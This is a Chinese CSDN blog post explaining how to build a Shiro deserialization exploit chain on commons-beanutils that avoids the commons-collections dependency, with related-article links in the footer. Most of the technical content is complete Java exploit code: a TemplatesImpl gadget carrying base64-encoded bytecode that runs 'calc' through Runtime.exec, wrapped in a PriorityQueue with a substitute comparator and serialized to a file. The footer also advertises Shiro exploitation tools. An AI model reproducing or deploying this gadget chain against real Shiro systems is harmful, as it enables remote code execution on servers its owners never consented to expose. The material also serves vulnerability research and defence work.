shiro无依赖利用链及exp编写

最新推荐文章于 2024-04-24 19:39:21 发布
最新推荐文章于 2024-04-24 19:39:21 发布
阅读量1.1k 收藏
点赞数
分类专栏: # java漏洞 文章标签: java servlet 前端 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/128932068
版权

一、背景

因为shiro是存在commons-beanutils的依赖的,这样我们可以通过构造原生的CB1的链进行攻击shiro,但是我们通过ysoserial的CB1的链会发现其实并不会成功。

原因是因为CB1的链里面其实是依赖于commons.collections包里面的部分内容的。如下发现是在我们构造BeanComparator的时候会调用,当没有显式传入Comparator 的情况下,则默认使用ComparableComparator

二、解决办法

那么我们如何避免如上情况呢,就需要找一个ComparableComparator的替代品。这个替代品需要满足如下几个情况:

  • 实现java.util.Comparator 接口

  • 实现java.io.Serializable 接口

  • Java、shiro或commons-beanutils自带,且兼容性强

通过对实现Serializable接口的类以及实现Comparator接口的类的对比,师傅们发现如下类:

  • CaseInsensitiveComparator

  • java.util.Collections$ReverseComparator

1.CaseInsensitiveComparator

  • CaseInsensitiveComparator这个类是java.lang.String 类下的一个内部私有类,实现了Comparator以及Serializable接口,并且可以通过String的内部的CASE_INSENSITIVE_ORDER值即可获取到

2.java.util.Collections$ReverseComparator

这个类也是jdk原生的Collections类里面的内部类,他同样实现了Comparator以及Serializable接口,并且可以通过Collections的reverseOrder()静态方法获取到

三、改造payload

通过如上我们的分析之后,我们知道只需要避开 ComparableComparator这个类,用我们找到的替代类来构造BeanComparator的时候就可以了。

1.首先创建恶意的TemplateImpl:

byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_bytecodes", new byte[][] {code});
setFieldValue(obj, "_name", "test");
setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

2.实例化BeanComparator,其中comparator的部分就用我们找到的替换类,下面两个用其中一个即可

BeanComparator comparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);

//            BeanComparator comparator = new BeanComparator(null, Collections.reverseOrder());

3.实例化优先队列PriorityQueue,如下因为我们上面comparator是比较的时候是String类型,所以在add的时候要用String类型的字符串。

PriorityQueue queue = new PriorityQueue(2,comparator);

queue.add("1");

queue.add("1");

4.反射将property 的值设置成恶意的outputProperties ,将队列里的两个1替换成恶意的TemplateImpl 对象

setFieldValue(comparator, "property", "outputProperties");

setFieldValue(queue, "queue", new Object[]{obj, obj});

完整代码:

import com.huawei.ysoserial.SeriallizationTest;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class CommonsBeanutilsShiro {
        public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
            Field field = obj.getClass().getDeclaredField(fieldName);
            field.setAccessible(true);
            field.set(obj, value);
        }
        public static void main(String[] args) throws Exception {
            //1.如下的code内容为弹出一个calc。
            byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
            TemplatesImpl obj = new TemplatesImpl();
            setFieldValue(obj, "_bytecodes", new byte[][] {code});
            setFieldValue(obj, "_name", "test");
            setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

            //2.实例化BeanComparator,其中comparator的部分就用我们找到的替换类,下面两个用其中一个即可
            BeanComparator comparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
//            BeanComparator comparator = new BeanComparator(null, Collections.reverseOrder());

            //3.实例化优先队列PriorityQueue,如下因为我们上面comparator是String类型,所以在add的时候要用String类型的字符串。
            PriorityQueue queue = new PriorityQueue(2,comparator);
            queue.add("1");
            queue.add("1");

            //4.反射将property 的值设置成恶意的outputProperties ,将队列里的两个1替换成恶意的TemplateImpl 对象
            setFieldValue(comparator, "property", "outputProperties");
            setFieldValue(queue, "queue", new Object[]{obj, obj});

            SeriallizationTest.serizlize(queue);
//            UnSerializeTest.unserialize("test.bin");
        }
}

Thunderclap_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
shiro泄露key无依赖利用技巧
渗透测试研究中心
12-26 1271
获取环境:拉取镜像到本地$ docker pull medicean/vulapps:s_shiro_1 启动环境$ docker run -d -p 80:8080 medicean/vulapps:s_shiro_11.使用shiro_attack_2.2工具对目标系统进行检查,发现有默认key但是无利用2.使用shior_tools.jar 直接对目标系统进行检测,检测完毕后会返回可执行...
Apache shiro 反序列化及利用
qq_37561898的博客
04-27 3079
convertBytestoPrincipals 解密 --> 反序列化 decrypt 解密 函数需要通过key 解密 密钥值是固定的 触发反序列化流程:读取cookie -> base64解码 -> AES解密 -> 反序列化 DNS可以出网,使用dnslog进行攻击 结合Dnslog与URLDNS方法有一个前提是DNS能出网。那么在不出网的情况下就需要找一个替代的方案了。结合SQL盲注的思路,可以考虑执行如下代码结合时间延迟进行判断,若系统是lin..
Java Shiro反序列化CommonsCollections利用分析
最新发布
qq_44192006的博客
04-24 542
本文主要分析CC1利用,先介绍了复现环境的搭建(该小节尽量帮大家避避坑,呜呜呜);然后紧跟着讲解了java反序列化和php反序列化漏洞的区别(希望大家不要有惯性思维认为反序列化漏洞都一样,其实java反序列化和php反序列化的差别还是很大的并介绍了复现学习java反序列化漏洞所需的一些前置知识;最后,也是文章的主体部分,从Sink(即可以触发执行命令的方法等)、chain及source(即利用的入口点)三个步骤,讲述利用的构建。纸上得来终觉浅,绝知此事要躬行。
shiro依赖利用
jy13172的博客
07-23 686
我们只要调用它的另一个构造函数,然后调用JDK或者CB自带的类就行了,同时还要满足两个条件,一方面就是继承。我们上次用的CC3的依赖,这次把这个依赖删了,使用shiro自带的依赖打。是嵌套的意思 跟进去发现,readMethod是我们传进去的参数。CC是对java集合类的增强,CB是对JavaBean的增强。虽然是CC4中的类,但是我们在传入系统的时候就把他修改成。是可以动态加载类的,也就是可以代码执行,所以。是我们传的参数,这里很可能是一个可以利用的点。,而且优先队列的参数也是可以控制的。
shiro下的cc利用
jy13172的博客
07-23 360
Java反序列化
case 逻辑java,java – 了解CaseInsensitiveComparator中的逻辑
weixin_36324426的博客
03-18 162
通常情况下,我们期望将案例转换一次并进行比较并完成。然而,代码转换的情况下两次,原因是在不同的方法的注释中说明public boolean regionMatches(boolean ignoreCase, int toffset, String other, int ooffset, int len):Unfortunately, conversion to uppercase does not...
Shiro反序列化漏洞利用笔记
文公子的博客
12-10 7115
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。 一、Shiro反序列化漏洞 1.1 安全框架 Apache Sh
ShiroExp-1.3.1-all.jar shiro反序列化检测工具
01-12
ShiroExp-1.3.1-all.jar shiro反序列化检测工具 我这里是用于搭建攻防演练演示环境用
Apache shiro1.10.0依赖
10-25
Apache shiro1.10.0依赖
apche shiro漏洞检测和利用工具
07-30
Shiro命令执行工具 ...摘取xray高级版 xray利用 100+个KEY已注释!!!! 声明:本工具仅供学习使用,禁止任何用于非法途径,如果使用该工具参与非法活动与本人无任何关系,本人不承担任何责任!
shiro无状态web集成的示例代码
08-29
本篇文章主要介绍了shiro无状态web集成的示例代码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Shiro-EXP:Apache Shiro 反序列化漏洞检测与利用工具,一键注入内存马
05-26
项目介绍 基于Apache Shiro反序列化漏洞进行利用的探测,附内存马。 利用时需要修改POST请求两处数据,分别为Header头RememberMe字段值和携带的data数据(由于payload设定,data中须指定名字为c的参数值)。 探测到利用后,根据提示,将屏幕输出的payload粘贴至POST请求Header头RememberMe字段处,至于data携带的数据,自行决策,本文文末附内存马,可直接粘贴至data中使用,或自行生成指定命令的字节码片段替换。 与项目相关文章首发于: Shiro exp使用手册 Shiro rememberMe反序列化漏洞 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie,服务端对rememberMe的cookie值先base64解码然后AES解密再反序列化,就导
ShiroExploit.V2.3rce图形化利用.zip
06-25
ShiroExploit.V2.3 shiro远程命令执行 550 721 一键漏洞利用 rce 图形化利用.zip
shiro1.9.1源码及jar
08-25
目前无漏洞版本shiro1.9.1源码+jar
shiro权限验证依赖
09-02
shiro权限验证依赖包,所有要用到的都在这里的,方面使用
Shiro安全(一):Shiro-550反序列化
weixin_43263451的博客
08-01 1717
Shiro550(CVE-2016-4437),其在护网期间担任重要的角色,也有很多的利用工具。本文将详细介绍Shiro550漏洞原理其实可以将AbstractRememberMeManager#getRememberedPrincipals当做主函数,其中getRememberedSerializedIdentity方法负责base64解码,convertBytesToPrincipals负责AES解密并反序列化。......
Java反序列化利用挖掘之Shiro反序列化
HongYu012的博客
02-24 1156
在跟了一遍commons-collections系列的payload后,终于可以开始解决一下当时对shiro反序列化模凌两可的认识了。 当前,不管是国内实际的xx行动还是ctf比赛,shiro反序列化会经常看到。但在实际利用这个漏洞的时候,会发现我们无法在tomcat下直接利用shiro-sample中的commons-collections:3.2.1(2021-03-16更新,这里经p牛指正,shiro并没有依赖cc库,详情)。 我们前面已经对commons-collections系列利用...
shiro拦截器
java_zc的博客
03-21 749
http://blog.csdn.net/u013378306/article/details/50545552 shiro默认过滤器(10个)  anon -- org.apache.shiro.web.filter.authc.AnonymousFilterauthc -- org.apache.shiro.web.filter.authc.FormAuthenticati
Shiro key的另类检测方式
Vicl1fe的博客
11-04 1203
前言 很久以前对于Shiro这个洞,都是基于URLDNS来爆破key的,但实际利用场景中,大部分是不出网的,后来出了一个新的检测key的方式,但一直只知道是通过SimplePrincipalCollection这个类来判断的 正确的key就不会回显rememberMe=deleteMe, 错误的key就会回显rememberMe=deleteMe, 但原理未知,今天就来分析一下。 返回rememberMe=deleteMe的几种情况 key不正确 跟踪一下Shiro解密的逻辑,在AbstractReme
shiro反序列化利用
07-29
Shiro 反序列化利用是一种攻击技术,利用 Apache Shiro 框架中的漏洞,通过序列化和反序列化的过程来执行恶意代码。这种攻击方式通常被用来绕过身份验证和授权机制,获取未经授权的访问权限。 具体来说,攻击者可以构造一个恶意的序列化对象,然后将其发送给目标应用程序。当应用程序尝试反序列化这个对象时,恶意代码就会被执行,从而导致安全漏洞。 为了防止 Shiro 反序列化攻击,可以采取以下措施: 1. 更新 Shiro 框架:确保使用最新版本的 Shiro 框架,因为开发者通常会修复已知的漏洞。 2. 序列化过滤:限制应用程序接受的序列化对象的类型和来源。 3. 输入验证:对用户输入进行严格的验证和过滤,防止恶意数据进入应用程序。 4. 安全配置:配置 Shiro安全策略和权限控制,确保只有授权的用户能够访问敏感资源。 5. 日志监控:监控应用程序的日志,检测异常行为和潜在的攻击。 请注意,这只是一些基本的防御措施,具体的应对策略还需要根据具体的应用程序和环境来确定。建议在部署和使用 Shiro 框架时,与安全专家合作,并进行全面的安全评估和测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值